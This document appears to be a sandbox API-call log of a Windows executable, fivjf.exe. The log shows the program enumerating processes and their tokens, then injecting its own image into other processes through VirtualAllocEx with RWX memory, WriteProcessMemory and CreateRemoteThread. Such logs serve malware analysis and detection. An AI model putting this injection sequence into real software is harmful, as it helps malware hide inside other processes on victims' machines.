ReturnLength=0x10ddd0) returned 1 [0124.713] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.714] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.714] CloseHandle (hObject=0x240) returned 1 [0124.714] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1 [0124.715] SetLastError (dwErrCode=0x0) [0124.715] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xee0) returned 0x240 [0124.715] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x298) returned 1 [0124.715] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.715] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.715] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.734] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.735] CloseHandle (hObject=0x240) returned 1 [0124.735] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.736] SetLastError (dwErrCode=0x0) [0124.736] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1130) returned 0x240 [0124.736] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x29c) returned 1 [0124.736] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.736] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.736] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.736] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.737] CloseHandle (hObject=0x240) returned 1 [0124.737] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x126c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1 [0124.738] SetLastError (dwErrCode=0x0) [0124.738] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x126c) returned 0x240 [0124.738] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x2a0) returned 1 [0124.738] GetTokenInformation (in: TokenHandle=0x2a0, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.738] GetTokenInformation (in: TokenHandle=0x2a0, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.738] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.738] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.739] CloseHandle (hObject=0x240) returned 1 [0124.739] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0124.739] SetLastError (dwErrCode=0x0) [0124.739] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xf58) returned 0x240 [0124.739] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x2a4) returned 1 [0124.739] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.740] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.740] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.740] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.740] CloseHandle (hObject=0x240) returned 1 [0124.740] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0124.741] CloseHandle (hObject=0x90) returned 1 [0124.741] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf810, nSize=0x64 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe")) returned 0x2f [0124.741] SetLastError (dwErrCode=0x0) [0124.741] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x448) returned 0x90 [0124.741] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0124.741] SetLastError (dwErrCode=0x0) [0124.741] VirtualAllocEx (hProcess=0x90, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x13f0e0000 [0124.783] WriteProcessMemory (in: hProcess=0x90, lpBaseAddress=0x13f0e0000, lpBuffer=0x13f0e0000*, nSize=0x34000, lpNumberOfBytesWritten=0x10e040 | out: lpBuffer=0x13f0e0000*, lpNumberOfBytesWritten=0x10e040*=0x34000) returned 1 [0124.790] CreateRemoteThread (in: hProcess=0x90, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13f0e1a30, lpParameter=0x13f0e0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x240 [0124.792] Sleep (dwMilliseconds=0x12c) [0125.111] SetLastError (dwErrCode=0x0) [0125.111] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x4a4) returned 0x2a8 [0125.112] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0125.112] SetLastError (dwErrCode=0x0) [0125.112] VirtualAllocEx (hProcess=0x2a8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x13f0e0000 [0125.565] WriteProcessMemory (in: hProcess=0x2a8, lpBaseAddress=0x13f0e0000, lpBuffer=0x13f0e0000*, nSize=0x34000, lpNumberOfBytesWritten=0x10e040 | out: lpBuffer=0x13f0e0000*, lpNumberOfBytesWritten=0x10e040*=0x34000) returned 1 [0125.569] CreateRemoteThread (in: hProcess=0x2a8, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13f0e1a30, lpParameter=0x13f0e0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ac [0125.570] Sleep (dwMilliseconds=0x12c) [0125.996] SetLastError (dwErrCode=0x0) [0125.996] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x59c) returned 0x2b0 [0125.996] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0125.996] SetLastError (dwErrCode=0x0) [0125.996] VirtualAllocEx (hProcess=0x2b0, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x13f0e0000 [0125.999] WriteProcessMemory (in: hProcess=0x2b0, lpBaseAddress=0x13f0e0000, lpBuffer=0x13f0e0000*, nSize=0x34000, lpNumberOfBytesWritten=0x10e040 | out: lpBuffer=0x13f0e0000*, lpNumberOfBytesWritten=0x10e040*=0x34000) returned 1 [0126.005] CreateRemoteThread (in: hProcess=0x2b0, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13f0e1a30, lpParameter=0x13f0e0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0126.006] Sleep (dwMilliseconds=0x12c) [0126.313] SetLastError (dwErrCode=0x0) [0126.313] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x118) returned 0x2b8 [0126.313] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0126.313] SetLastError (dwErrCode=0x0) [0126.313] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0126.313] GetLastError () returned 0x1e7 [0126.313] CloseHandle (hObject=0x2b8) returned 1 [0126.313] Sleep (dwMilliseconds=0x12c) [0126.626] SetLastError (dwErrCode=0x0) [0126.626] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x74c) returned 0x2b8 [0126.627] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0126.627] SetLastError (dwErrCode=0x0) [0126.627] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0126.627] GetLastError () returned 0x1e7 [0126.627] CloseHandle (hObject=0x2b8) returned 1 [0126.627] Sleep (dwMilliseconds=0x12c) [0126.936] SetLastError (dwErrCode=0x0) [0126.936] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6c0) returned 0x2b8 [0126.936] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0126.936] SetLastError (dwErrCode=0x0) [0126.936] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0126.936] GetLastError () returned 0x1e7 [0126.936] CloseHandle (hObject=0x2b8) returned 1 [0126.936] Sleep (dwMilliseconds=0x12c) [0127.261] SetLastError (dwErrCode=0x0) [0127.261] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x2b0) returned 0x2b8 [0127.261] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0127.261] SetLastError (dwErrCode=0x0) [0127.261] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0127.261] GetLastError () returned 0x1e7 [0127.261] CloseHandle (hObject=0x2b8) returned 1 [0127.261] Sleep (dwMilliseconds=0x12c) [0127.560] SetLastError (dwErrCode=0x0) [0127.560] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x57c) returned 0x2b8 [0127.560] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0127.560] SetLastError (dwErrCode=0x0) [0127.560] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0127.560] GetLastError () returned 0x1e7 [0127.560] CloseHandle (hObject=0x2b8) returned 1 [0127.561] Sleep (dwMilliseconds=0x12c) [0127.872] SetLastError (dwErrCode=0x0) [0127.872] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x770) returned 0x2b8 [0127.872] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0127.872] SetLastError (dwErrCode=0x0) [0127.872] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0127.872] GetLastError () returned 0x1e7 [0127.872] CloseHandle (hObject=0x2b8) returned 1 [0127.872] Sleep (dwMilliseconds=0x12c) [0128.184] SetLastError (dwErrCode=0x0) [0128.184] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7a8) returned 0x2b8 [0128.185] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0128.185] SetLastError (dwErrCode=0x0) [0128.185] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0128.185] GetLastError () returned 0x1e7 [0128.185] CloseHandle (hObject=0x2b8) returned 1 [0128.185] Sleep (dwMilliseconds=0x12c) [0128.500] SetLastError (dwErrCode=0x0) [0128.500] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x434) returned 0x2b8 [0128.500] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0128.500] SetLastError (dwErrCode=0x0) [0128.500] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0128.500] GetLastError () returned 0x1e7 [0128.500] CloseHandle (hObject=0x2b8) returned 1 [0128.500] Sleep (dwMilliseconds=0x12c) [0128.808] SetLastError (dwErrCode=0x0) [0128.808] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x79c) returned 0x2b8 [0128.808] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0128.808] SetLastError (dwErrCode=0x0) [0128.808] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0128.809] GetLastError () returned 0x1e7 [0128.809] CloseHandle (hObject=0x2b8) returned 1 [0128.809] Sleep (dwMilliseconds=0x12c) [0129.120] SetLastError (dwErrCode=0x0) [0129.120] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x518) returned 0x2b8 [0129.120] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0129.120] SetLastError (dwErrCode=0x0) [0129.120] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0129.120] GetLastError () returned 0x1e7 [0129.120] CloseHandle (hObject=0x2b8) returned 1 [0129.120] Sleep (dwMilliseconds=0x12c) [0129.432] SetLastError (dwErrCode=0x0) [0129.432] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2b8 [0129.432] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0129.432] SetLastError (dwErrCode=0x0) [0129.432] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0129.433] GetLastError () returned 0x1e7 [0129.433] CloseHandle (hObject=0x2b8) returned 1 [0129.433] Sleep (dwMilliseconds=0x12c) [0129.744] SetLastError (dwErrCode=0x0) [0129.744] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x170) returned 0x2b8 [0129.744] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0129.744] SetLastError (dwErrCode=0x0) [0129.744] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0129.744] GetLastError () returned 0x1e7 [0129.744] CloseHandle (hObject=0x2b8) returned 1 [0129.744] Sleep (dwMilliseconds=0x12c) [0130.056] SetLastError (dwErrCode=0x0) [0130.056] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x218) returned 0x2b8 [0130.056] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0130.056] SetLastError (dwErrCode=0x0) [0130.056] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0130.056] GetLastError () returned 0x1e7 [0130.056] CloseHandle (hObject=0x2b8) returned 1 [0130.056] Sleep (dwMilliseconds=0x12c) [0130.368] SetLastError (dwErrCode=0x0) [0130.368] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6a0) returned 0x2b8 [0130.368] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0130.368] SetLastError (dwErrCode=0x0) [0130.368] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0130.368] GetLastError () returned 0x1e7 [0130.368] CloseHandle (hObject=0x2b8) returned 1 [0130.369] Sleep (dwMilliseconds=0x12c) [0130.681] SetLastError (dwErrCode=0x0) [0130.681] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5d0) returned 0x2b8 [0130.681] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0130.681] SetLastError (dwErrCode=0x0) [0130.681] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0130.681] GetLastError () returned 0x1e7 [0130.681] CloseHandle (hObject=0x2b8) returned 1 [0130.681] Sleep (dwMilliseconds=0x12c) [0130.995] SetLastError (dwErrCode=0x0) [0130.995] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x210) returned 0x2b8 [0130.995] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0130.995] SetLastError (dwErrCode=0x0) [0130.995] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0130.995] GetLastError () returned 0x1e7 [0130.995] CloseHandle (hObject=0x2b8) returned 1 [0130.995] Sleep (dwMilliseconds=0x12c) [0131.304] SetLastError (dwErrCode=0x0) [0131.304] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1c4) returned 0x2b8 [0131.304] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0131.304] SetLastError (dwErrCode=0x0) [0131.304] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0131.304] GetLastError () returned 0x1e7 [0131.304] CloseHandle (hObject=0x2b8) returned 1 [0131.304] Sleep (dwMilliseconds=0x12c) [0131.622] SetLastError (dwErrCode=0x0) [0131.622] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5ac) returned 0x2b8 [0131.623] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0131.623] SetLastError (dwErrCode=0x0) [0131.623] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0131.623] GetLastError () returned 0x1e7 [0131.623] CloseHandle (hObject=0x2b8) returned 1 [0131.623] Sleep (dwMilliseconds=0x12c) [0131.928] SetLastError (dwErrCode=0x0) [0131.928] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x248) returned 0x2b8 [0131.928] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0131.928] SetLastError (dwErrCode=0x0) [0131.928] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0131.928] GetLastError () returned 0x1e7 [0131.928] CloseHandle (hObject=0x2b8) returned 1 [0131.928] Sleep (dwMilliseconds=0x12c) [0132.272] SetLastError (dwErrCode=0x0) [0132.272] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x704) returned 0x2b8 [0132.272] GetModuleHandleA (lpModuleName=0x0) returned 0x13f0e0000 [0132.272] SetLastError (dwErrCode=0x0) [0132.272] VirtualAllocEx (hProcess=0x2b8, lpAddress=0x13f0e0000, dwSize=0x34000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0132.273] GetLastError () returned 0x1e7 [0132.273] CloseHandle (hObject=0x2b8) returned 1 [0132.273] Sleep (dwMilliseconds=0x12c) [0132.600] SetLastError (dwErrCode=0x0) [0132.600] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x12b0) returned 0x0 [0132.600] Sleep (dwMilliseconds=0x12c) [0132.943] SetLastError (dwErrCode=0x0) [0132.943] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xf90) returned 0x0 [0132.943] Sleep (dwMilliseconds=0x12c) [0133.255] SetLastError (dwErrCode=0x0) [0133.255] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xf10) returned 0x0 [0133.255] Sleep (dwMilliseconds=0x12c) [0133.573] SetLastError (dwErrCode=0x0) [0133.573] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6f0) returned 0x0 [0133.573] Sleep (dwMilliseconds=0x12c) [0133.880] SetLastError (dwErrCode=0x0) [0133.880] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xec0) returned 0x0 [0133.880] Sleep (dwMilliseconds=0x12c) [0134.222] SetLastError (dwErrCode=0x0) [0134.222] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1010) returned 0x0 [0134.222] Sleep (dwMilliseconds=0x12c) [0134.550] SetLastError (dwErrCode=0x0) [0134.550] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xee0) returned 0x0 [0134.550] Sleep (dwMilliseconds=0x12c) [0134.877] SetLastError (dwErrCode=0x0) [0134.877] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1130) returned 0x0 [0134.877] Sleep (dwMilliseconds=0x12c) [0135.189] SetLastError (dwErrCode=0x0) [0135.189] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x126c) returned 0x0 [0135.189] Sleep (dwMilliseconds=0x12c) [0135.501] SetLastError (dwErrCode=0x0) [0135.501] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xf58) returned 0x0 [0135.501] Sleep (dwMilliseconds=0x12c) [0135.816] Sleep (dwMilliseconds=0x1388) [0140.884] GetWindowsDirectoryW (in: lpBuffer=0x10dfe0, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0140.884] SetLastError (dwErrCode=0x0) [0140.884] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.884] GetLastError () returned 0x20 [0140.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 